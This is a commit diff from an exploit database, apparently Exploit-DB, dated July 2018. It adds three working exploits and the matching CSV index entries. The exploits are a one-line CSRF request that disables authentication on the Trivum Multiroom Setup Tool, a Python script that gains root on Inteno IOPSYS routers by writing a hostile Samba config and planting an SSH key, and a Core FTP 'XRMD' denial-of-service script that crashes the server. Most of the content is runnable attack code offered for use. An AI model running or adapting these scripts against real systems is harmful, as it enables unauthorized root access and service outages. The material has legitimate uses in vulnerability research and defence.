DB: 2018-07-27

3 changes to exploits/shellcodes Core FTP 2.0 - 'XRMD' Denial of Service (PoC) Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
2018-07-27 05:01:45 +00:00 · 2018-07-27 05:01:45 +00:00 · cfbfaba0a7
commit cfbfaba0a7
parent ed985d30e0
4 changed files with 186 additions and 0 deletions
--- a/exploits/hardware/webapps/45088.txt
+++ b/exploits/hardware/webapps/45088.txt
@ -0,0 +1,19 @@
 # Exploit Title: Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
 # Date: 2018-07-25
 # Software Link: [https://world.trivum-shop.de](https://world.trivum-shop.de/)
 # https://world.trivum-shop.de/# Version: < 9.34 build 13381 - 12.07.18
 # Category: hardware, webapps
 # Tested on: V8.76 - SNR 8604.26 - C4 Professional
 # Exploit Author: vulnc0d3c
 # CVE: CVE-2018-13859
 # 1. Description
 # MusicCenter / Trivum Multiroom Setup Tool V8.76 - SNR 8604.26 - C4 Professional before V9.34 build 13381 - 12.07.18,
 # allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request
 # to the end-point "?id=0&attr=protectAccess&newValue=0"
 # (successful attack will allow attackers to login without authorization).
 # 2. Proof of Concept
 # GET Request
 http://target/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0
--- a/exploits/linux/local/45089.py
+++ b/exploits/linux/local/45089.py
@ -0,0 +1,101 @@
 #!/usr/bin/python
 import json
 import sys
 import subprocess
 import socket
 import os
 from websocket import create_connection
 def ubusAuth(host, username, password):
    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
    req = json.dumps({"jsonrpc":"2.0","method":"call",
        "params":["00000000000000000000000000000000","session","login",
        {"username": username,"password":password}],
        "id":666})
    ws.send(req)
    response =  json.loads(ws.recv())
    ws.close()
    try:
        key = response.get('result')[1].get('ubus_rpc_session')
    except IndexError:
        return(None)
    return(key)
 def ubusCall(host, key, namespace, argument, params={}):
    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
    req = json.dumps({"jsonrpc":"2.0","method":"call",
        "params":[key,namespace,argument,params],
        "id":666})
    ws.send(req)
    response =  json.loads(ws.recv())
    ws.close()
    try:
        result = response.get('result')[1]
    except IndexError:
        if response.get('result')[0] == 0:
            return(True)
        return(None)
    return(result)
 if __name__ == "__main__":
    host = "192.168.1.1"
    sshkey = "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ=="
    user = "user"
    pasw = "user"
    conf = """[global]
 	netbios name = IntenoSMB 
 	workgroup = IntenoSMB
 	server string = IntenoSMB
 	syslog = 10
 	encrypt passwords = true
 	passdb backend = smbpasswd
 	obey pam restrictions = yes
 	socket options = TCP_NODELAY
 	unix charset = UTF-8
 	preferred master = yes
 	os level = 20
 	security = user
 	guest account = root
 	smb passwd file = /etc/samba/smbpasswd
 	interfaces = 192.168.1.1/24 br-lan 
 	bind interfaces only = yes
 	wide links = no
 [pwn]
 	path = /
 	read only = no
 	guest ok = yes
 	create mask = 0700
 	directory mask = 0700
 	force user = root
 """
    print("Authenticating...")
    key = ubusAuth(host, user, pasw)
    if (not key):
        print("Auth failed!")
        sys.exit(1)
    print("Got key: %s" % key)
    print("Dropping evil Samba config...")
    ltc = ubusCall(host, key, "file", "write_tmp",
        {"path":"/tmp/etc/smb.conf", "data": conf})
    if (not ltc):
        print("Failed to write evil config!")
        sys.exit(1)
    print("Creating temp file for key...")
    with open(".key.tmp","a+") as file:
        file.write(sshkey)
        path = os.path.realpath(file.name)
    print("Dropping key...")
    subprocess.run("smbclient {0}pwn -U% -c 'put {1} /etc/dropbear/authorized_keys'".format(r"\\\\" + host + r"\\", path),
        shell=True, check=True)
    print("Key dropped")
    print("Cleaning up...")
    os.remove(path)
    print("Exploitation complete. Try \"ssh root@%s\"" % host)
--- a/exploits/windows/dos/45091.py
+++ b/exploits/windows/dos/45091.py
@ -0,0 +1,63 @@
 # Exploit Title: Core FTP 2.0 - 'XRMD' Denial of Service (PoC)
 # Date: 2018-07-24
 # Exploit Author: Erik David Martin
 # Vendor Homepage: http://www.coreftp.com/
 # Software Link: http://www.coreftp.com/server/download/CoreFTPServer.exe
 # Version: Version 2.0, build 653, 32-bit
 # Tested on: Windows XP Professional, Version 2002, Service Pack 3
 # CVE: N/A
 # Proof of concept:
 # Create a new domain and set IP address
 # Use the default certificate by Core FTP Server
 # Set base directory
 # Create an anonymous user (anonymous:anonymous) for example
 # Set a path for the user
 # Start the server
 # Run exploit: python exploit.py *target ip* anonymous anonymous
 # Watch the server crash...
 # The exploit will work for any user, and not just anonymous
 import sys
 import socket
 try:
 	host = sys.argv[1]
 	username = sys.argv[2]
 	password = sys.argv[3]
 except:
 	print("Usage: exploit.py *target ip* *username* *password*")
 	sys.exit()
 mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #
 mysocket.settimeout(2)
 try:
 	mysocket.connect((host,21))
 	mysocket.recv(1024)
 	print("\n[+] Connected\n")
 except:
 	print("[-] Error! Could not connect to target")
 	sys.exit()
 junk = ("asO8M.lFX[Gq<4<p(.P5eMLv]\2!G8jB_6Gx[I;I!aYa#oAi@kI<f.QFwkSBiQ,!")
 try:
 	mysocket.send("USER " + username + "\r\n")
 	mysocket.recv(1024)
 	mysocket.send("PASS " + password + "\r\n")
 	mysocket.recv(1024)
 	print("[+] Logged in as " + username)
 except:
 	print("[-] Error! Could not log in as " + username)
 	sys.exit()
 print("[+] Sending malicious request")
 while True:
 	try:
 		mysocket.send("XRMD " + junk + "\r\n")
 		mysocket.recv(1024)
 	except:
 		print("[+] Target is down\n")
 		sys.exit()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6026,6 +6026,7 @@ id,file,description,date,author,type,platform,port
 45082,exploits/linux/dos/45082.txt,"Nagios Core 4.4.1 - Denial of Service",2018-07-24,"Fakhri Zulkifli",dos,linux,
 45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows,
 45087,exploits/windows/dos/45087.py,"GetGo Download Manager 6.2.1.3200 - Denial of Service (PoC)",2018-07-25,"Nathu Nandwani",dos,windows,
 45091,exploits/windows/dos/45091.py,"Core FTP 2.0 - 'XRMD' Denial of Service (PoC)",2018-07-26,"Erik David Martin",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9830,6 +9831,7 @@ id,file,description,date,author,type,platform,port
 45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,
 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39705,3 +39707,4 @@ id,file,description,date,author,type,platform,port
 45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
 45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
 45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
 45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,